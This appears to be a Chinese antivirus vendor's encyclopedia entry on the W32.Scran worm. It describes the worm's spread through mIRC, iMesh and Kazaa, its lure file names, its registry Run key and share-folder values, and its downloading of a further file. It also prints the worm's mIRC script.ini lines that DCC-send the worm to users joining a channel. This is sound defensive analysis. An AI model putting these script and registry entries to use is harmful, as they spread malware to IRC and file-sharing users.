病毒名称(中文):
渣子
病毒别名:
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
12800
影响系统:
Win9xWinNT
病毒行为:
这是一个通过mIRC频道、iMesh和Kazaa文件共享系统传播的蠕虫病毒。该病毒发作的时候将自己的多个副本拷贝到%ProgramFiles%\sys32i目录下,这些病毒的名字取的都是流行软件的名字,因此具有很强的欺骗性,用户很可能误以为是正常的文件而去运行,从而导致中毒。病毒通过修改注册表和mIRC的脚本配置文件,将病毒与mIRC频道、iMesh和Kazaa文件共享系统联系起来,使得病毒能够通过这三个途径进行传播。假如系统时间是1月1日,该病毒还会弹出一个如下图所示的消息框,此外该病毒还从网上下载病毒到本地机器上运行。
1)建立互斥体W32.Scran-Worm,防止病毒的多个实例同时运行。
2)从网络上下载病毒到c:\botnet.exe
3)在%ProgramFiles%\sys32i目录下建立病毒的多个副本:
Scran.exe
Scran.cpl
ResidentEvil.exe
TombRaider.exe
HotmailHack.exe
YahooHack.exe
PartitionMagic8.exe
NortonAntiVirusCrack.exe
NortonAntiVirus2004.exe
NortonAntiVirus2005.exe
NortonFirewall.exe
CDKey.exe
KeyGen.exe
TrojanRemover.exe
CounterStrike.exe
CounterStrike6.exe
Half-Life.exe
AgeofEmpirescrack.exe
AgeofEmpires.exe
Hotmailaccountcracker.exe
MicrosoftOffice.exe
NortonInternetSecurity2004.exe
ZoneAlarmFirewallPro.exe
WindowsXPHome.exe
Playstation2.exe
GrandTheftAuto3CD2ISO.exe
4)添加启动项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"W32.Scran"="%ProgramFiles%\sys32i\Scran.exe"
5)在注册表子键
HKEY_CURRENT_USER\Software\Imesh\Client\LocalContent
下添加键值
"Dir0"="012345:%ProgramFiles%\sys32i\"
将%ProgramFiles%\sys32i设置为iMesh的默认传输路径
在注册表子键
HKEY_CURRENT_USER\Software\Kazaa\Transfer
下添加键值
"DlDir0"="%ProgramFiles%\sys32i"
和
在注册表子键
HKEY_CURRENT_USER\Software\Kazaa\LocalContent
下添加键值
"Dir0"="012345:%ProgramFiles%\sys32i\"
将%ProgramFiles%\sys32i设置为Kazaa的默认传输路径
6)向%ProgramFiles%\mIRC\script.ini中写入以下脚本,通过mIRC传播病毒:
[script]
n0=on1:JOIN:#:{
n1=/if($nick==$me){halt}
n2=/.dccsend$nick%ProgramFiles%\sys32i\Scran.cpl
